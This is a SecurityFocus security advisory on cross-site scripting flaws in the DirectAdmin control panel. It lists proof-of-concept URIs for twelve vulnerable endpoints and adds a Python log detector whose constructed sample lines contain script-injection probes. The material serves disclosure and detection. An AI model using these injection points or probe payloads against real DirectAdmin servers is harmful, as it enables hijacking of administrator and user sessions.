DirectAdmin Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com:2222/CMD_SHOW_RESELLER?userXSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_TICKET_CREATE?TYPE=XSS
http://www.example.com:2222/CMD_EMAIL_FORWARDER_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_TICKET?action=view&number=000000044&type=XSS
http://www.example.com:2222/CMD_EMAIL_VACATION_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_EMAIL_LIST?action=view&DOMAIN=demo.com&name=XSS
http://www.example.com:2222/CMD_FTP_SHOW?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_FILE_MANAGER/xss
http://www.example.com:2222/CMD_FILE_MANAGER/images=xss
http://www.example.com:2222/HTM_EMAIL_POP_MODIFY?DOMAIN=demo.com&USER=xss
http://www.example.com:2222/CMD_ADMIN_FILE_EDITOR?file=XSS
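Added example, not part of the SecurityFocus advisory or of DirectAdmin itself: a small Python detector that flags requests to the endpoints listed above whose percent-decoded input carries HTML/JS metacharacters, run over constructed access-log lines. It assumes a combined-format web access log (DirectAdmin's own log layout may differ; only the `LOG_REQUEST` regex depends on it) and decodes input once, so double-encoded probes would need a second decoding pass.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Endpoints named in the PoC URIs above that reflect request input into the page.
AFFECTED = frozenset({
    "/CMD_SHOW_RESELLER", "/CMD_SHOW_USER", "/CMD_TICKET_CREATE",
    "/CMD_EMAIL_FORWARDER_MODIFY", "/CMD_TICKET", "/CMD_EMAIL_VACATION_MODIFY",
    "/CMD_EMAIL_LIST", "/CMD_FTP_SHOW", "/HTM_EMAIL_POP_MODIFY",
    "/CMD_ADMIN_FILE_EDITOR",
})
FILE_MANAGER = "/CMD_FILE_MANAGER/"
# Tokens that never belong in a user, domain, ticket type or file name and signal
# an attempt to break out of the surrounding HTML (checked after percent-decoding).
SUSPICIOUS = re.compile(r'[<>"\']|javascript:|\bon\w+\s*=', re.IGNORECASE)
# Request field of a combined-format access log line (assumed layout).
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_request(target):
    """Return (endpoint, decoded input) for a flagged request target, else None."""
    parts = urlsplit(target)
    if parts.path.startswith(FILE_MANAGER):
        # The file manager reflects the path tail itself, not a query parameter.
        tail = unquote(parts.path[len(FILE_MANAGER):])
        return (FILE_MANAGER.rstrip("/"), tail) if SUSPICIOUS.search(tail) else None
    if parts.path in AFFECTED:
        # Decode once; the CMD_SHOW_RESELLER probe has no '=' so scan the whole query.
        query = unquote_plus(parts.query)
        if SUSPICIOUS.search(query):
            return (parts.path, query)
    return None

def scan_log(lines):
    """Return one (client, endpoint, decoded input) tuple per flagged log line."""
    hits = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        hit = suspicious_request(m.group(1)) if m else None
        if hit:
            hits.append((line.split(" ", 1)[0],) + hit)
    return hits

# Constructed sample lines, not real traffic: one benign lookup, two probes, one unrelated page.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2010:10:00:01 +0000] "GET /CMD_SHOW_USER?user=alice HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Mar/2010:10:00:02 +0000] "GET /CMD_SHOW_USER?user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [12/Mar/2010:10:00:03 +0000] "GET /CMD_FILE_MANAGER/%22%3E%3Cimg%20src=x%3E HTTP/1.1" 200 700',
    '203.0.113.9 - - [12/Mar/2010:10:00:04 +0000] "GET /CMD_LOGIN HTTP/1.1" 200 300',
]
```

`scan_log(SAMPLE_LOG)` flags the second and third lines only; the unrelated `/CMD_LOGIN` request and the legitimate user lookup pass through untouched.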

Copyright 2010, SecurityFocus